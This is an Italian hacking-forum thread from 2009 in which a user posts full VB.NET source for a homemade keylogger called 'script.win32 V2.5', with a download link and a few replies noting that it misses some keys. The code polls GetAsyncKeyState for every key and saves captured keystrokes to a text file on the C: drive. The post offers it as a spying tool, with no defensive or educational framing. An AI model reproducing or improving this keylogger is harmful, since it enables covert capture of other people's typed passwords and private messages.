• Regolamento Macrocategoria DEV
    Prima di aprire un topic nella Macrocategoria DEV, è bene leggerne il suo regolamento. Sei un'azienda o un hosting/provider? Qui sono anche contenute informazioni per collaborare con Sciax2 ed ottenere l'accredito nella nostra community!

Guida script.win32 V2.5

SONNYDJJ

Utente Medio
Autore del topic
1 Settembre 2009
159
0
Miglior risposta
0
script.win32 V2.5 il keylogger che salva cio che scrivi in file di testo

buon giorno a tutti ,
sono riuscito finalmente a realizzare un mio vecchio progetto:un keylogger che salva i suoi risultati su un file di testo.
DOPO AVER PREMUTO END SPY MODE PREMERE START, CLICCARE CERCA,SELEZIONARE TUTTI I FILE O CARTELLE E CERCARE :"risultati script win 32"
il file è un file.txt.
ottimo iniziamo dal codice

Public Class Form1
Dim result As Integer
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
Timer1.Start()
MsgBox("spy mode attivata")
End Sub

Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
For i = 1 To 255
result = 0
result = GetAsyncKeyState(i)
If result = -32767 Then
testo.Text = testo.Text + Chr(i)
End If
Next i

End Sub

Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click
Dim percorso As String
Dim contenuto As String
percorso = "C:\testo1.txt"
contenuto = testo.Text

IO.File.WriteAllText(percorso, contenuto)
Dim fileReader As String
fileReader = My.Computer.FileSystem.ReadAllText("C:\testo1.txt")
testo.Text = fileReader
testo.Text = ""
Timer1.Stop()
MsgBox("spy mode disattivata")
End Sub

Private Sub NotifyIcon1_MouseDoubleClick(ByVal sender As System.Object, ByVal e As System.Windows.Forms.MouseEventArgs) Handles NotifyIcon1.MouseDoubleClick

End Sub
End Class

se volete potete scaricarlo da megaupload
(
Perfavore, Entra oppure Registrati per vedere i Link!
)
grazie e alla prossima:ciao:

Ultima modifica:
si ma non va con tutti i tasti .. me ne ero definito uno che aveva in se ogni tasto di ogni lingua io :soso:

Semplice mi sa ke era già stata postata una guida con le relative source ke erano uguali bho xd

si ma son key che utilizzno pochi tasti, deve definirsi tutte le api i case ecc.

ma certo, guarda che sti codici si imparano all'inizio ::emoji_relieved: funziona funziona.